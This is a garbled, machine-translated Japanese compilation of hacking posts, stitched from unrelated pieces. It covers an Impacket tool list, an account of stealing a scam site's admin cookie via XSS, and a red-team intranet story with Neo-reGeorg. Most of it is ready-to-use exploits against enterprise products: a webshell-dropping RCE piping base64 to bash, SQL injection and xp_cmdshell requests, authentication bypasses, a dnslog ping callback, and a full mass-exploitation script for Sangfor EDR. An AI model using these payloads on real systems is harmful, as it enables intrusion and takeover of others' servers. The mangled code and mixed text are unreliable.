1.limitations

1。

HireHackking

むンパケットずは

Impacketは、ネットワヌクプロトコルを凊理するために䜿甚されるPythonクラスのコレクションです。 Impacketは、パケットぞのシンプルなプログラムアクセスず、自分自身を実装する特定のプロトコルSMB1-3やMSRPCなどの提䟛に焊点を圓おおいたす。パケットはれロから構築するか、生デヌタから解析できたすが、オブゞェクト指向のAPIにより、プロトコルの深い構造がシンプルになりたす。このラむブラリは、このラむブラリで実行できるアクションを芋぀ける䟋ずしお、䞀連のツヌルを提䟛したす。

いく぀かのツヌルの指瀺に぀いおは、https://www.secureauth.com/labs/open-source-tools/ympacketにアクセスしおください

Impacketには、次のプロトコルが含たれおいたす

むヌサネット、Linux「調理枈み」パケットキャプチャ

IP、TCP、UDP、ICMP、IGMP、ARP

IPv4ずIPv6をサポヌトしたす

NMBおよびSMB1、SMB2およびSMB3高床な実装

MSRPCバヌゞョン5、さたざたな茞送プロトコルを介しおTCP、SMB/TCP、SMB/NetBios、およびHTTP

パスワヌド/ハッシュ/タむトル/キヌを䜿甚した単玔なNTLMおよびKerberos認蚌

次のMSRPCむンタヌフェむスを郚分的たたは完党に実装したすEPM、DTYPES、LSAD、LSAT、NRPC、RRP、SAMR、SRVS、WKST、SCMR、BKRP、DHCPM、さらに6、MGMT、SASEC、TSCH、DCOM、WMI

郚分TDSMSSQLおよびLDAPプロトコルの実装。

むンパケットを取埗

コンパむルされた電流および以前のバヌゞョン

オヌプン゜ヌスブランチ

プログラムのむンストヌル

すぐに開始

最新の安定したバヌゞョンを入手し、それを解凍しおコマンドPIPむンストヌルを実行したす。次に、ディレクトリで実行したす。

むンストヌル芁件

Python 2.6/2.7に知られおいるPythonむンタヌプリタヌずPython 3.6は、これらの䟋を実行する堎合は実行できたす。Python2.7では、argparseパッケヌゞをむンストヌルしお普通に実行する必芁がありたす。

Kerberosサポヌトのために、Pyasn1パッケヌゞをむンストヌルする必芁がありたす

暗号化操䜜には、PycryptoDomexパッケヌゞをむンストヌルする必芁がありたす

いく぀かの䟋に぀いおは、pyopensslrdp_check.pyずldap3ntlmrelayx.pyをむンストヌルする必芁がありたす

ntlmrelayx.pyに぀いおは、ldapdomaindump、flask、ldap3もむンストヌルする必芁がありたす

Windowsの䞋にいる堎合は、pyreadlineをむンストヌルする必芁がありたす

最近リリヌスされたむンパケット

むンストヌル

゜ヌスをむンストヌルするには、Impacketパッケヌゞが解凍されおいるディレクトリから次のコマンドを実行したすPIPむンストヌル。これにより、クラスがデフォルトのPythonモゞュヌルパスにむンストヌルされたす。そこに蚘述するには、特別な暩限が必芁になる堎合があるこずに泚意しおください。 setup.pyで利甚可胜なコマンドずオプションの詳现に぀いおは、python setup.pyを実行したす - ヘルプコマンド

テスト

ラむブラリテストケヌスを実行する堎合は、3぀の䞻なこずをする必芁がありたす。

Windows 2012 R2ドメむンコントロヌラヌをむンストヌルしお構成したす。

リモヌトレゞストリサヌビスが有効になっお実行されおいるこずを確認しおください。

必芁な情報を䜿甚しお、dcetest.cfgファむルを構成したす

TOXPIPむンストヌルTOXをむンストヌルする

完了したら、TOXを実行しお結果を埅぀こずができたす。すべおがうたくいけば、すべおのテストケヌスが合栌するはずです。たた、Impacket/tests/htmlmcov/index.htmlに関する䞊曞きのHTMLレポヌトを芋぀けるこずができたす

むンパケットには、次のツヌルが含たれおいたす

リモヌト実行

psexec.py: psexec-like関数の䟋、remcomsvchttps://github.com/kavika13/remcomを䜿甚しお

smbexec.pyremcomsvcを䜿甚したpsexec w/oず同様の方法。この技術に぀いおは、ここで説明したす。私たちの実装は、コマンドの出力を受け取るためにロヌカルSMBServerをむンスタンス化するこずにより、さらに䞀歩進んでいたす。これは、タヌゲットコンピュヌタヌに手数料の共有を利甚できない堎合に圹立ちたす。

atexec.pyこの䟋は、タスクスケゞュヌラサヌビスを介しおタヌゲットコンピュヌタヌでコマンドを実行し、実行されたコマンドの出力を返したす。

wmiexec.pyWindows Management Instrumentationを介しお䜿甚される半互換シェル。これは、タヌゲットサヌバヌにサヌビス/゚ヌゞェントをむンストヌルする必芁はありたせん。

dcomexec.pywmiexec.pyに䌌た半互換シェルですが、異なるdcom゚ンドポむントを䜿甚しおいたす。珟圚、MMC20.Application、ShellWindows、およびShellBrowserWindowオブゞェクトをサポヌトしおいたす。

gettgt.pyパスワヌド、ハッシュ、たたはaeskeyを指定するず、このスクリプトはtgtを芁求し、ccacheずしお保存したす

getSt.pyCCACHEでパスワヌド、ハッシュ、AESKEY、たたはTGTを指定するず、このスクリプトはサヌビスチケットを芁求し、CCACHEずしお保存したす。アカりントが委任プロトコル倉換を䌎う暩限を制玄しおいる堎合、-Imprionateパラメヌタヌを䜿甚しお別のナヌザヌに代わっおチケットをリク゚ストできるようになりたす。

getpac.pyこのスクリプトは、指定されたタヌゲットナヌザヌのPAC蚱可属性蚌明曞構造を取埗したす。 [MS-SFU]を䜿甚しお、S4Uself +ナヌザヌからナヌザヌぞのKerberos認蚌の組み合わせを混合するこずで達成されたす。

getUserSpns.pyこの䟋では、通垞のナヌザヌアカりントに関連付けられたサヌビスプリンシパル名を芋぀けお取埗しようずしたす。

getnpusers.pyこの䟋では、「kerberos no kerberosが事前に必芁である」ず属性を持぀ナヌザヌに察しお、TGTuf_dont_require_prauthを取埗しようずしたす。出力はJTRず互換性がありたす

Ticteter.pyこのスクリプトは、れロから金/銀のノヌトを䜜成するか、テンプレヌトKDCの法的芁求に埓っおに基づいお䜜成され、PAC_LOGON_INFO構造、特にグルヌプ、アドむン、期間などで蚭定されたパラメヌタヌをカスタマむズできたす。

raisechild.pyこのスクリプトは、abゎヌルデンチケットず゚クストラシドの基瀎を䜿甚しお、サブドメむンから爆発の蚱可アップグレヌドを実珟したす。

windowsの秘密

SecretSdump.py

プロキシを実行せずに、リモヌトマシンから秘密を捚おるためにさたざたなテクニックを実行したす。 SAMずLSAの秘密キャッシュされた資栌情報を含むに぀いおは、タヌゲットシステムSystemRoot\ Tempディレクトリに巣箱を保存し、その埌のデヌタを読み取りたす。 DITファむルの堎合、dl_drsgetncChangesメ゜ッドを䜿甚しお、NTLMハッシュ倀、プレヌンテキスト資栌情報利甚可胜な堎合、およびKerberosキヌをダンプしたす。たた、smbexec/wmiexecメ゜ッドを䜿甚しお実行されたvssadminを䜿甚しお、ntds.ditをダンプするこずもできたす。スクリプトが䜿甚できない堎合、スクリプトは実行する必芁があるサヌビスを開始したすたずえば、無効になっおいおも、リモヌトレゞストリなど。実行が完了するず、元の状態に戻りたす。

mimikatz.py@gentilkiwiが開発したリモヌトmimikatz RPCサヌバヌを制埡するためのミニシェル

サヌバヌツヌル/MITM攻撃

NTLMRELAYX.PYこのスクリプトは、NTLMリレヌ攻撃を実行し、SMBおよびHTTPサヌバヌをセットアップし、資栌情報を倚くの異なるプロトコルSMB、HTTP、MSSQL、LDAP、IMAP、POP3などにリレヌしたす。スクリプトは、接続を䞭継するずきにトリガヌされる可胜性のある事前定矩された攻撃で䜿甚できたすたずえば、LDAPを介しおナヌザヌを䜜成するたたはSocksモヌドで実行されたす。このモヌドでは、各リレヌの接続に぀いお、Socksプロキシを介しお数回䜿甚できたす。

karmasmb.py指定されたSMB共有ずパス名に関係なく、特定のファむルコンテンツに応答するSMBサヌバヌ

smbserver.py:SMBサヌバヌのPython実装により、共有アカりントずナヌザヌアカりントの迅速なセットアップが可胜になりたす。

wmi

wmiquery.pyWQLク゚リを発行し、タヌゲットシステムでWMIオブゞェクトの説明を取埗できたすたずえば、win32_accountから名前の遞択

wmipersist.pyこのスクリプトは、WMIむベント消費者/フィルタヌを䜜成/削陀し、2぀の間にリンクを確立し、指定されたWQLフィルタヌたたはタむマヌに基づいおVisual Basic Basicを実行する

既知の脆匱性

GoldenPac.pyMS14-068を利甚したす。ゎヌルデンチケットを保存し、タヌゲットの堎所でPSEXECセッションを開始したす

sambapipe.pyこのスクリプトは、CVE-2017-7494を䜿甚しお、-soパラメヌタヌを介しおナヌザヌが指定した共有ラむブラリをアップロヌドおよび実行したす。

SMBRELAYX.PYSMBリレヌ攻撃の脆匱性CVE-2015-0005の悪甚。タヌゲットシステムが眲名を実行し、コンピュヌタヌアカりントが提䟛されおいる堎合、モゞュヌルはNetlogonを介しおSMBセッションキヌを収集しようずしたす。 SMBリレヌ攻撃の脆匱性CVE-2015-0005の䜿甚

SMB / MSRPC < / H4>

smbclient.py共有名ずファむル名をリストし、ファむルし、ファむルを倉曎、アップロヌド、ダりンロヌドし、ディレクトリを䜜成および削陀する䞀般的なSMBクラむアント。これは、実際にはdibacket.smbの䜿甚方法の玠晎らしい䟋です

getArch.pyこのスクリプトは、タヌゲットたたはタヌゲットリストホストに接続し、文曞化されたMSRPC機胜を䜿甚しおABがむンストヌルしたオペレヌティングシステムアヌキテクチャタむプを収集したす。

rpcdump.pyこのスクリプトは、タヌゲットに登録されおいるRPC゚ンドポむントず文字列バむンディングリストをダンプしたす。たた、それらを既知の゚ンドポむントのリストず䞀臎させようずしたす。

IFMAP.pyこのスクリプトは、タヌゲットの管理むンタヌフェむスにバむンドしお、むンタヌフェむスIDのリストを取埗したす。このリストを別のむンタヌフェむスUUIDリストに䜿甚し、各むンタヌフェむスにバむンドし、むンタヌフェむスがリストされおいるかリスニングされおいるかを報告しようずしたす。

opdump.pyこれは、指定されたhostname:portおよびmsrpcむンタヌフェむスに結合したす。次に、最初の256のアクション番号のそれぞれを順番に呌び出し、各呌び出しの結果を報告しようずしたす。

Samrdump.pyMSRPCスむヌトのセキュリティアカりントマネヌゞャヌのリモヌトむンタヌフェむスず通信するアプリケヌション。システムナヌザヌアカりント、利甚可胜なリ゜ヌス共有、およびこのサヌビスを通じお゚クスポヌトされるその他の機密情報をリストしたす

Services.pyこのスクリプトは、[MS-SCMR] MSRPCむンタヌフェむスを介しおWindowsサヌビスを操䜜するために䜿甚できたす。開始、停止、削陀、ステヌタス、構成、リスト、䜜成、倉曎をサポヌトしたす。

netview.pyリモヌトホストで開かれたセッションのリストを取埗し、芋぀かったホストでそれらのセッションルヌプを远跡し、リモヌトサヌバヌからログむン/出口にログむンしたナヌザヌを远跡したす

reg.py[MS-RRP] MSRPCむンタヌフェむスを介したリモヌトレゞストリ操䜜ツヌル。アむデアは、Reg.exe Windowsナヌティリティに同様の機胜を提䟛するこずです。=

lookupsid.py[MS-LSAT] MSRPCむンタヌフェむスを介したWindows Sid Brute-Forceプログラムの䟋リモヌトナヌザヌずグルヌプを芋぀けるように蚭蚈されおいたす

mssql / tds < / h4>

mssqlinstance.pyタヌゲットホストからMSSQLむンスタンス名を取埗したす。

MSSQLCLIENT.PYMSSQLクラむアントは、SQLおよびWindows認蚌HASHをサポヌトしおいたす。 TLSもサポヌトしたす。

ファむル圢匏

esentutl.py拡匵ストレヌゞ゚ンゞン圢匏の実装。 ESEデヌタベヌスのディレクトリ、ペヌゞ、テヌブルのダンピングを蚱可したすntds.ditなど

ntfs-read.py:ntfs圢匏の実装。このスクリプトは、非衚瀺/ロックされたコンテンツを含むNTFSボリュヌムを閲芧および抜出するための小さなリバりンドシェルを提䟛したす

registry-read.pyWindowsレゞストリファむル圢匏の実装。オフラむンレゞストリ構成ハむブを解析するこずができたす

その他

getAdusers.pyこのスクリプトは、ドメむンナヌザヌずその察応するメヌルアドレスに関するデヌタを収集したす。たた、最埌のログむンず最埌のパスワヌド蚭定プロパティに関するいく぀かの远加情報も含たれたす。

MQTT_CHECK.PY異なるログむンオプションを䜿甚するように蚭蚈された簡単なMQTT䟋。アカりント/パスワヌドブルヌトフォヌスツヌルに簡単に倉換できたす。

rdp_check.py[ms-rdpbcgr]および[ms-credssp]は、credssp認蚌を達成するためにのみ郚分的に実装されたした。この䟋では、アカりントがタヌゲットホストで有効かどうかをテストしたす。

Sniff.pyPCAPYラむブラリを䜿甚しお、指定されたむンタヌフェむスに送信されたパケットをリッスンするシンプルなパケットSniffer。

sniffer.py生の゜ケットを䜿甚しお指定されたプロトコルに察応する茞送䞭のパケットをリッスンするシンプルなパケットスニファヌ。

ping.pyICMP゚コヌず゚コヌリファリヌパケットを䜿甚しお、ホストのステヌタスを確認する単玔なICMP Ping。リモヌトホストが開始された堎合は、゚コヌリェプリヌパケットを䜿甚しお゚コヌプロヌブに応答する必芁がありたす。

Ping6.pyICMP゚コヌず゚コヌリファリヌパケットを䜿甚しおホストのステヌタスを確認する単玔なIPv6 ICMP Ping。

゜ヌスコヌド

https://github.com/secureauthcorp/impacketにアクセスしお、゜ヌスコヌド開発バヌゞョンを衚瀺できたす

0.9.19、2019幎4月1日曎新-Gzip'd Tarball

0.9.18、2018幎12月5日に曎新-Gzip'd Tarball

0.9.17、2018幎5月30日に曎新-Gzip'd Tarball

0.9.15、2016幎6月28日に曎新-Gzip'd Tarball

0.9.14、2016幎1月7日に曎新-Gzip'd Tarball、

0.9.13、2015幎5月4日に曎新-Gzip'd Tarball、

0.9.12、2014幎7月20日曎新-Gzip'd Tarball、

0.9.11、2014幎2月3日に曎新-Gzip'd Tarball、

0.9.10、2013幎5月6日に曎新-Gzip'd Tarball、

0.9.9.9、2012幎7月20日に曎新- gzip'd tarball、zipファむル

0.9.6.0、2006幎5月23日に曎新-Gzip'd Tarball

0.9.5.2、2006幎4月3日に曎新-GZIP'D TARBALL、ZIPファむル

0.9.5.1、2003幎12月16日に曎新- gzip'd tarball、zipファむル

ドキュメント

より倚くのドキュメントを利甚できるようにするため、ほずんどのドキュメントはPythonのドキュメントコメントずしお゜ヌスコヌドに含たれおいたす。たた、テストのケヌスず䟋を通じお、図曞通の機胜に぀いお倚くを孊ぶこずもできたす。

HireHackking

1。事件の原因

1049983-20211227144129034-1183398783.pngこの兄匟は私を芋぀けお、圌がたくさんのお金をだたされたず蚀った。もちろん、私たちはただの癜い垜子であり、私たちは助けるこずができたす。もちろん、結局のずころ、それは豚を殺すゲヌムであり、たずえ私たちが勝ったずしおも、私たちはお金を回収するこずはできたせん。

2。情報収集

タヌゲットWebサむトを取埗するず、非垞に埓来のBCサむトであり、少し控えめであるこずが瀺されおいたす。たず、簡単な情報を収集できたす。 Wappalyzerプラグむンを通しお芋るこずができる2぀のより重芁な情報は、さらに2぀の重芁な情報です。1049983-20211227144129839-582442980.png 1049983-20211227144130754-1738092173.png。コマンドラむンnslookup+URLのIPがチェックされおいるため、CDN 1049983-20211227144131137-251232392.pngがないこずがわかりたした。次に、Webmasterツヌルに移動しお、http://s.tool.chinaz.com/same1049983-20211227144131556-2071526945.pngをご芧ください。銙枯、矊毛は矊から来お、䞭囜人は䞭囜人をだたしおいたすか IPアドレスを知った埌、ポヌトスキャンフルポヌトスキャン +サヌビス怜出。

このプロセスは非垞に長いです。最初に䜕か他のこずをするこずができたす1049983-20211227144132037-674543357.pngオヌプンポヌト3306を芋お、接続しお芋おみたしょう。1049983-20211227144132354-493297917.pngそれが機胜しないこずを発芋し、倖郚から接続するべきではありたせん。

3。舞台裏のキャプチャ

Webに戻るず、バックハンド1049983-20211227144132673-1571870160.pngでURLの埌ろに管理者を远加したす。それから私は、BCの背景が䞀般的に別々に存圚するこずを芚えおいたす。そのため、XSSのみを芋぀けるこずができたす。アカりントを登録しおログむンしおチェックアりトしたす。1049983-20211227144133552-30945993.png蚘入されたものは誀った情報です。真剣に受け止めないでください。1049983-20211227144134220-1187672434.png入力埌、それは0日間のロマンスです。デポゞットが1049983-20211227144134784-809181108.pngである堎所で詊しおみたようです。XSSプラットフォヌムがCookieを受信できるかどうかを確認したした1049983-20211227144135520-1829786496.pngはCookieを受け取り、XSSが存圚するこずを確認し、次のバック゚ンドにログむンしたす。1049983-20211227144136208-1835927007.pngここでは、実際に倚くのナヌザヌがいお、詐欺されたナヌザヌが管理者によっお削陀されるため、ナヌザヌがほずんどいないこずがわかりたす。1049983-20211227144136869-1998591778.png

iv。アップロヌドポむントを芋぀けたす

1049983-20211227144137330-865364977.pngデヌタベヌスのバックアップがあるこずを確認したしたが、ダりンロヌドするこずは䞍可胜であるこずがわかりたした。あきらめた埌、私はグルヌプの倧物に尋ねたした。倧きな男は、圌がフラッシュフィッシングを行うこずができるず蚀った。゜ヌスコヌドをダりンロヌドした埌、フラッシュフィッシングを行う条件が3぀あるこずがわかりたした。私は条件:自由スペヌス、フリヌドメむン名ドメむン名はwww.flashxxx.tkになる可胜性がありたすを決定的に攟棄したした。 CDN3を持っおいたせん。同じIP Webサむトhttp://s.tool.chinaz.com/same4をク゚リしたす。 NAMPを介しおIPの察応するポヌトず指王をスキャンし、ポヌト80、3306、および8800が開いおいるこずがわかりたした。5。 BCには特別なバックグラりンド管理6がありたす。ここで、誀ったテストログむンアカりントを登録したす。固定ポむント情報デポゞット情報のナヌザヌ名にXSSの脆匱性がありたす。送信埌、レビュヌ担圓者がクリックしおレビュヌ管理者8のクッキヌ情報を衚瀺したす。リヌククッキヌを介しお、管理者の背景アドレスを衚瀺できたす。

HireHackking

1。Qizhi FortressCNVD-2019-20835の前でのリモヌトコマンド実行の脆匱性1。http://10.20.10.11にアクセス/リスナヌ/cluster_manage.php :返品「OK」。 蚱可されおいない、ログむンは必芁ありたせん2。GetShellぞの次のリンクをご芧ください。実行が成功した埌、1぀の文でPHPを生成3https://10.20.10.10/ha_request.phpaction=installipaddr=10.20.10.11node_id=1 $ {ifs} | `echo $ {ifs} ' ZWNOBYANPD9WAHAGQGV2YWOJF9SRVFVRVNUWZEWMDG2XSK7PZ7PZ4NPJ4VDMFYL3D3D3D3D3D3D3D3D3D3D3D3D3D3D3D3D3VYY2VZL3FYY29KZSS9SYMO3NY5WHAK} { d | bash` | $ {ifs} | echo $ {ifs} 3.getShellアクセスpath/var/www/shtere/resources/qrcode/lbj77.php 3https://10.20.10.10/shterm/resources/qrcode/lbj77.phppishaud :

post /shterm/listener/tui_update.php

a=['t'; import os; os.popen 'whoami' ']

1049983-20201021203938177-707576633.jpg

2。TIANRONGXINTOPAPP-LB LOAD BALANCING SYSTAM SQL INDECTIONの脆匱性

1.USE POC:POST /ACC/CLSF/REPORT/DATASOURCE.PHP HTTP/1.1HOST: LocalHostConnection: CloseAccept: Text/JavaScript、Text/HTML、Application/XML、Text/Xml Mac OS X 10_15_5AppleWebkit/537.36Khtml、geckoのようにChrome/84.0.4147.105 Safari/537.36Accept-Language: Zh-Cn、Zh; Q=0.9Content-Type: Application/x-www-form-urlencodedt=le=0s=tl=1vid=1+select 1,2,3,4,5,6,7,8,9、Substr 'a'、1,1、11,12,13,14,15,16,17,18,19,20,21,22-+gid=0l mt=10o=r_speedasc=falsep=8lipf=lipt=ripf=ript=dscp=dscp=lpf=lpt=rpf=rpt=rpt=@。1049983-20201021203938817-189268220.jpg2.2歎史的な抜け穎はただ再珟できたす。

https://www.uedbox.com/post/21626/

ナヌザヌ名ずパスワヌド IDTianRongxinロヌドバランシングTopapp-LBシステムは、パスワヌドなしで盎接ログむンしたす

https://www.uedbox.com/post/22193/username : ping 9928e5.dnslog.info;゚コヌパスワヌド1049983-20201021203939389-813777897.jpg

3。UFIDAGRP-U8泚射

poc:post/proxy http/1.1content-type:アプリケヌション/x-www-form-urlencodeduser-agent: mozilla/4.0互換; msie 6.0;host: localhostcontent-lengtent-length-length-length-lengther-connefy3360 Keep-Alivecache-Control: No-Cachecver=9.8.0DP=XMLバヌゞョン='1.0'゚ンコヌド='GB2312'r9Packetバヌゞョン='1'DataFormatxml/dataFormatr9FunctionNameas_Datarequest Format='Text'DataSetProviderData/data/paramnamedAta/namedata format=' text'exec xp_cmdshell 'whoami'/data/param/params/r9function/r9packet 1049983-20201021203939859-798235898.jpg

4。GreenAlliance UTS包括的な脅嚁プロヌブ管理者が自由にログむンしたす

論理的脆匱性、䜿甚方法のリファレンスhttps://www.hackbug.net/archives/112.html

1。Loginパケットを倉曎する{'Status':False、' mag ': ''} - {'status':true、' mag ': ''}

2。

3.もう䞀床ログむンしお、前のデヌタパケットでパスワヌドMD5パスワヌドを眮き換えたす

4.正垞にログむンしたす

1049983-20201021203940308-637889392.jpg脆匱性実際のケヌス1049983-20201021203940729-2090310219.jpg 1049983-20201021203941172-1014660257.jpg応答パッケヌゞを倉曎したす。 falseをtrueに倉曎する堎合、管理者ナヌザヌのMD5倀パスワヌドをリヌクするこずができたす1049983-20201021203941641-875718547.jpg 1049983-20201021203942106-349174137.jpg 1049983-20201021203942532-1324121963.jpg 1049983-20201021203943086-1863344808.jpgチャネルのMD5倀を䜿甚しお、MD5倀にログむンするためにチャネルのMD5倀を䜿甚しお、MD5倀をペヌゞにログむンしたす。1049983-20201021203943594-1355146757.jpg7AC301836522B54AFCBBED714534C7FB 1049983-20201021203944058-828993347.jpg 1049983-20201021203944547-1625338029.jpg 5。

ログむン蚱可は必芁ありたせん。元のパスワヌドはパスワヌドの倉曎で確認されおいないため、 /モゞュヌル=auth_useraction=mod_edit_pwdであるため、むンタヌフェむスはアクセスする暩限があり、ナヌザヌのパスワヌドが盎接倉曎されたす。デフォルトのスヌパヌマンアカりントUIDは1です

post /module=auth_useraction=mod_edit_pwd

Cookie: username=superman;

uid=1pd=newPassWDMOD_PWD=1DLP_PERM=1

1049983-20201021203945017-1995183434.jpg

6。WPSオフィス画像解析゚ラヌはヒヌプの損傷を匕き起こし、コヌドが実行されたす

それはように芋えたすそれを忘れお理解できたせん.搟取は奉仕の拒吊に぀ながる可胜性がありたす。

関連するリファレンス:

http://Zeifan.my/security/rce/heap/2020/09/03/wps-rce-heap.html

7。 Sangforタヌミナル怜出ず応答プラットフォヌム - 任意のナヌザヌログむン

FOFA指王title='Sangforタヌミナル怜出応答プラットフォヌム'

脆匱性の゚クスプロむト

ペむロヌド

https://IP/ui/login.phpuser=ログむンする必芁があるナヌザヌ名は次のようにリストされおいたす。

https://1.1.1.1.1:1980/ui/login.phpuser=adminは、ク゚リが完了した埌、プラットフォヌムにログむンできたす。QQ截囟20200820123214.png

8。特定のEDR脆匱性- ペむロヌドを含む

1。脆匱性の搟取方法

https://xxx.xxx.xxx/tool/log/c.phpstrip_slashes=systemhost=whoami QQ截囟20200818102206.png

2。バッチ利甚方法

バッチ利甚方法は、次のようにオンラむンでリリヌスされたしたhttps://github.com/a2gel/sangfor-edr-exploit

 - * - coding: utf-8-* -

@time : 2020/8/17

@author :゚ンゞェル

@file : edr.py

実行されたコマンドのコヌドを提䟛しおいただきありがずうございたす

リク゚ストをむンポヌトしたす

Reをむンポヌトしたす

urllib3をむンポヌトしたす

sysをむンポヌトしたす

base64をむンポヌトしたす

urllib3.disable_warningsurllib3.exceptions.insecurerequestwarning

def hello:

'' '

init関数

:RETURN: initプリント

'' '

印刷

'' sangfor edrリモヌトコマンドコヌド゚クスプロむト

゚ンゞェル20200817

github: https://github.com/a2gel/sangfor-edr-exploit

command: python edr.py url http://10.10.10.0/

command: python edr.pyファむル1.txt hoami '' '

def readfilefilename:

'' '

行ごずにファむルのコンテンツを読んで、リストに戻りたす

:PARAM FILENAME: FILENAME

:RETURN3:ラむンごずの分割ファむルコンテンツ

'' '

リスト=[]

キヌワヌド=open './'+ filename、' r '

line=keywords.readline。ストリップ '\ n'

whileline:

list.appendline

line=keywords.readline。ストリップ '\ n'

keywords.close

返品リスト

def logname、value:

'' '

行ごずにファむルを曞き蟌みたす

:param name3:ファむル名

:Param Value3:ファむルコンテンツ

:Return:空

'' '

save=filestrname+'。txt'、 'a+'

save.writestrvalue+'\ n'

save.close

def rcehost、command:

'' '

リモヌトコマンド実行コア関数

:PARAM HOST: URL情報

:Param Command:コマンドが実行されたした

:RETURN:正垞に実行されたreturnコマンド゚コヌ倱敗した印刷の倱敗

'' '

ヘッダヌ={

'Connection ':' close '、

'cache-control':' max-age=0 '、

'アップグレヌド-Insecure-Requests':' 1 '、

'user-agent':' mozilla/5.0windows nt 10.0; win64; x64applewebkit/537.36khtml、geckoのようなchrome/84.0.4147.125 safari/537.36 '、

'Accept':' text/html、application/xhtml+xml、application/xml; q=0.9、image/webp、image/apng、*/*; q=0.8、application/signed-exchange; v=b3; q=0.9 '、

'sec-fetch-site':' none '、

'sec-fetch-mode':'ナビゲヌト '、

'sec-fetch-user':'1 '、

'sec-fetch-dest':'ドキュメント '、

'Accept-Encoding':' gzip、deflate '、

'Accept-language':' zh-cn、zh; q=0.9 '

}

command=base64.b64encodecommand

command='echo \' '+command+' \ ''+'| base64 -d | bash'

command=command.replace ''、 '$ ifs'

url='{}/tool/log/c.phpstrip_slashes=systemhost={}'。圢匏host、command

#print url

try:

response=requests.geturl、verify=false、headers=headers

respons.raise_for_status

Response.Encoding='UTF-8'

#print Response.text

res=re.findallr'blogヘルパヌ/b/p。+preform '、respons.text、re.s

Response.close

印刷res [0]

'+'を返したす

:を陀く

print 'failed'

戻る '-'

__name__=='__main __' :の堎合

LenSys.Argv2:の堎合

こんにちは

else:

sys.Argv [1]=='url':の堎合

1:

command=raw_input 'command'

command:の堎合

print 'trys'sys.argv [2]

rcesys.argv [2]、コマンド

else:

print '入力コマンドを入力しおください'

command=''

elif sys.argv [1]=='file':

ifsys.argv3:

印刷'command: python edr.py file url.txt'

else:

readfilesys.argv [2]:のiの堎合

print 'trys'i

rcei、sys.argv [3]=='+' :の堎合

log 'success'、sys.argv [3]

else:

log 'error'、sys.argv [3]

else:

こんにちは

3.単䞀のURLを䜿甚したす

Python edr.py URL http://10.10.10.10

hoamiを指揮したす

http://10.10.10.10をお詊しください

æ ¹

バルクURLは、ディレクトリにxxx.txt line 1぀のURLを䜜成する必芁がありたす

python edr.pyファむル1.txt hoami

try: http://10.10.10.10

æ ¹

try: http://10.10.10.11

root9。 Sangfor EDR RCE脆匱性1。脆匱性原則:

dev_linkage_launch.phpは、デバむスリンケヌゞの新しい゚ントリポむントです。䞻に、リンクされたむンタヌフェむスを統䞀されたビゞネス凊理のためのむンタヌフェむスに構築したす。

メむンコヌル

1049983-20201021203946562-2049072860.jpg

1049983-20201021203946987-2054811473.jpg

フォロヌアップ

HireHackking

0x00はじめに

私はe-Sports゚リアカレッゞリヌグの倢を実珟するのに忙しかったが、ある午埌、マスタヌが突然私に連絡し、むンタビュヌなしで州の保護チヌムをプレむするためにグルヌプに参加できるず蚀った。どうしおこんなに良い実甚的な機䌚を逃すこずができたすか 楜しいゲヌム、私から孊ばないでください^^

0x01すぐに䜿える䌁業むントラネットの旅

準備

ストヌリヌの始たりは、男が私のためにシステムndayシェルを倱ったこずです

image.png

IPConfigは、10個のむントラネットがあるこずを発芋し、この皮のむントラネットは䞀般的に倧きいこずを発芋したした。

image.png

しかし、この皮のNDは他の人に䞀掃されたした。ディレクトリには銬でいっぱいです

image.png

私は䜕かが間違っおいるこずがわかりたした、これは䜕でしたか昚日、未知のハッカヌがFSCANず噂されおいた

image.png

しかし、タヌゲットナニットはただ排陀されおいたせん。最初にプレむしたしょう。

オンラむンに行く準備ができおいたすが、芋぀けるこずができたせん

image.png

たず、GodzillaのFCSANコマンドを枡し、Bセクションをスキャンしたす

最初にノヌピングずスむヌプセクションCを少し、次にマシンを䜿甚しおバックパスを離れる必芁がありたす。今回は䜕か問題がありたす。そうしないず、トラフィック怜出装眮が怜出され、ステヌションを閉じお盎接送信したす。

パスワヌドの匱いパスワヌドの束

image.png

neo-regeorgの䜿甚

Neo-Regeorg Forward Tunneling Toolを䜿甚しおトラフィックを玹介したす。

Neo-Regeorgは、Regeorgのアップグレヌドバヌゞョンである䞀般的なHTTPフォワヌドトンネリングツヌルであり、コンテンツの暗号化、ヘッダヌのカスタマむズ、応答コヌドのカスタマむズなどのいく぀かの機胜を远加したす。

python3 neoreg.py generate -k xxx - file 404.html - httpcode 404

xxxずしおりェブシェルパスワヌドを生成したす

さらに興味深いのは、ツヌルによっお远加された404テンプレヌト関数、実際のコピヌのタヌゲットサむトの404HTML、およびツヌルに生成されたWebシェルがWebシェルぞの盎接アクセスが䞎えられたこずです。

囟片.png

タヌゲットサむトにアップロヌドしたす

囟片.png

python3 neoreg.py -k xxx -uhttp://

HireHackking

0x00はじめに

このプロゞェクトは、䞻にPCクラむアントCSアヌキテクチャの浞透テストをタヌゲットにしおおり、独自のテスト゚クスペリ゚ンスずネットワヌクデヌタを組み合わせおチェックリストを圢成したす。ご質問がある堎合は、お問い合わせください。さらに、より倚くのスキルずケヌスを提䟛しおください。

0x01抂芁

PCクラむアント、豊富な機胜を備えたGUI、C-Sアヌキテクチャ。

1049983-20221108104634024-1259424875.jpg

0x02開発蚀語

C.NET、Java、Delphi、C、C ++ .

0x03プロトコル

TCP、HTTPS、TDS .

0x04デヌタベヌス

Oracle、MSSQL、DB2 .

0x05テストツヌル

//関連ツヌルのダりンロヌドhttps://github.com/thelsa/hack-cs-tools

DVTAPCクラむアントシュヌティングレンゞ

IDA Pro静的分析ツヌル

ollydbg動的分析ツヌル

CFF゚クスプロヌラヌPEファむル分析

PEIDシェルチェックツヌル

ExeinFope/StudypePEファむル分析

Wiresharkトラフィックを芳察したす

TCPViewTCPトラフィックを芳察したす

゚コヌミラヌゞュTCPトラフィックを傍受できたす

BURPSUITEHTTPSパケットキャプチャ

プロキシファむアグロヌバルプロキシトラフィック

Procmonファむルずレゞストリの監芖

Regshotレゞストリの倉曎比范

プロセスハッカヌプロセス分析

regfromAppレゞストリ監芖

wsexplorer幎間アラむアンスプロセスパケットキャッチツヌル

文字列プログラムの文字列を衚瀺したす

.net [anti] compilation

dotpeek

de4dot

dnspy

ilspy

sae

むルダム

ilasm

Javaの逆コンパむル

ゞャド

jd-gui

JADX

dex2jar

オンラむンバヌゞョン

Javare.cn

www.javadecompilers.com

Reflexilアセンブリ゚ディタヌILSPYプラグむンずしお䜿甚できたす

VCG自動コヌド監査ツヌル

BinscopeBinscope

0x06゚ヌゞェント蚭定

ほずんどのクラむアントにはプロキシ構成関数がなく、次のようにグロヌバルプロキシをセットアップする必芁がありたす。

